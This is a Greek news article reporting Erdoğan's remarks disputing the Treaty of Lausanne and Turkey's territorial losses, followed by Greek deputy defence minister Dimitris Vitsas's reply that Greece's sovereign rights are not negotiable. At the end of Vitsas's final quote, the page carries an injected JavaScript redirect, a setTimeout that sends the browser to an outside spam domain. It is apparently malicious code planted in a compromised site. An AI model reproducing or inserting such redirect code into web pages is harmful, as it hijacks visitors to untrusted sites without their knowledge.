Προκλητικός Ερντογάν: Ξαναμφισβητεί τη Συνθήκη της Λωζάννης -Tι απαντά ο Βίτσας

0
17

 

Συνεχίζει τις προκλητικές δηλώσεις με επεκτατική διάθεση, ο Τούρκος πρόεδρος Ρετζέπ Ταγίπ Ερντογάν. Μετά τα περί Συνθήκης της Λωζάννης επανήλθε στη διάρκεια ομιλίας του σε αξιωματούχους της τοπικής αυτοδιοίκησης στην Άγκυρα λέγοντας: «Το 1914… Κοιτάξτε πού ήμασταν και πού φτάσαμε… Ααααχ! Βαααααχ! Άραγε οι νέοι μας αυτά τα γνωρίζουν; Από 2,5 εκατ. τ. χλμ. που ήταν τα εδάφη μας, 9 χρόνια μετά με την υπογραφή της Λωζάννης και λίγο μετά με την προσάρτηση της Αντιόχειας μαζί, τα εδάφη μας έπεσαν στα 780 χιλιάδες τ.μ. Από 2,5 εκατ. στα 780 χιλιάδες. Σε πόσο μικρή χρονική διάρκεια, ε;».

«Το 2016 δεν μπορούμε να κινούμαστε με την ψυχολογία του 1923. Είναι το μεγαλύτερο άδικο που μπορεί να γίνει σε μία χώρα και σε ένα λαό. Να επιμένουμε σε αυτό! Όταν αλλάζουν τα πάντα στον κόσμο από τότε που ιδρύθηκε η Δημοκρατία μας, το να μένουμε πίσω σε εκείνη την ημερομηνία, αυτό δεν είναι νίκη!» κατέληξε στην ομιλία του με έντονη εθνικιστική χροιά…

Βίτσας: Δεν διαπραγματευόμαστε τα κυριαρχικά μας δικαιώματα

«Η Ελλάδα δεν διεκδικεί τίποτα από κανέναν, όμως ξέρει ποια είναι τα κυριαρχικά της δικαιώματα και δεν τα βάζει καν στο τραπέζι της διαπραγμάτευσης», τόνισε ο Δημήτρης Βίτσας.

Ο αναπληρωτής υπουργός Εθνικής Άμυνας, μιλώντας στον ΣΚΑΪ υπογράμμισε, επίσης, πως «το ζήτημα των τουρκικών παραβιάσεων το αντιμετωπίζουμε με ψυχραιμία και αποφασιστικότητα και το μεταφέρουμε και στις διεθνείς συμμαχίες που συμμετέχουμε».

«Καλούμε την Τουρκία να αντιληφθεί ότι δεν θα λυθούν τα προβλήματά της με το να τα βγάζει έξω από τη χώρα. Παράλληλα, καλούμε τους ευρωπαίους συμμάχους να αντιληφθούν ότι τα σύνορα της Ελλάδας είναι και τα σύνορα της Ευρώπης και πρέπει να βοηθήσουν ώστε να επιτευχθεί σταθερότητα στην περιοχή», κατέληξε ο κ. Βίτσας setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here